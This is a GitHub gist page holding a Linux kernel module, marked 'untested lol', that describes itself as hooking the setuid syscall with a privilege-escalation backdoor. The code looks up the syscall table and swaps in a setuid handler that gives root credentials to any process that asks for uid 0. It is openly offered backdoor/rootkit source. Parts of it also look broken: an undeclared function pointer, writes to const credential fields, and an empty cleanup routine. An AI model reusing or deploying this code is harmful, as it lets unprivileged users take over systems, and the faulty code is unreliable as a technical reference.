Created
December 6, 2022 09:27
-
-
Save DavidBuchanan314/35b6b9ddb1c7c0e01f76450d4294d2c3 to your computer and use it in GitHub Desktop.
untested lol
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <linux/module.h> | |
| #include <linux/kernel.h> | |
| #include <linux/syscalls.h> | |
| #include <linux/kallsyms.h> | |
| /* Function that replaces the original setuid syscall. | |
| * It behaves the same as the original syscall, except it also | |
| * checks if the provided uid is 0 (root), and if so, | |
| * it grants the calling process root privileges. | |
| */ | |
| asmlinkage long my_setuid(uid_t uid) | |
| { | |
| if (uid == 0) { | |
| current->cred->uid = 0; | |
| current->cred->euid = 0; | |
| current->cred->suid = 0; | |
| current->cred->fsuid = 0; | |
| } | |
| return original_setuid(uid); | |
| } | |
| /* Function that finds the address of the syscall table */ | |
| unsigned long *find_syscall_table(void) | |
| { | |
| /* Look up the address of the syscall table symbol */ | |
| unsigned long *sys_call_table = (unsigned long*)kallsyms_lookup_name("sys_call_table"); | |
| if (sys_call_table == NULL) { | |
| /* Handle error - symbol not found */ | |
| return NULL; | |
| } | |
| return sys_call_table; | |
| } | |
| /* Function that saves the address of the original setuid syscall */ | |
| void save_setuid(void) | |
| { | |
| /* Find the address of the syscall table */ | |
| unsigned long *sys_call_table = find_syscall_table(); | |
| if (sys_call_table == NULL) { | |
| /* Handle error - syscall table not found */ | |
| return; | |
| } | |
| /* Save the address of the original setuid syscall */ | |
| original_setuid = (void*)sys_call_table[__NR_setuid]; | |
| } | |
| /* Function that installs our replacement setuid syscall */ | |
| void install_setuid(void) | |
| { | |
| /* Find the address of the syscall table */ | |
| unsigned long *sys_call_table = find_syscall_table(); | |
| if (sys_call_table == NULL) { | |
| /* Handle error - syscall table not found */ | |
| return; | |
| } | |
| /* Install our replacement setuid syscall */ | |
| sys_call_table[__NR_setuid] = (unsigned long)my_setuid; | |
| } | |
| /* Module initialization function */ | |
| static int __init my_module_init(void) | |
| { | |
| save_setuid(); | |
| install_setuid(); | |
| return 0; | |
| } | |
| /* Module cleanup function */ | |
| static void __exit my_module_exit(void) | |
| { | |
| /* TODO: restore the original setuid syscall */ | |
| } | |
| /* Register module initialization and cleanup functions */ | |
| module_init(my_module_init); | |
| module_exit(my_module_exit); | |
| /* Module metadata */ | |
| MODULE_AUTHOR("Your Name"); | |
| MODULE_DESCRIPTION("A kernel module that hooks the setuid syscall with a privesc backdoor"); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment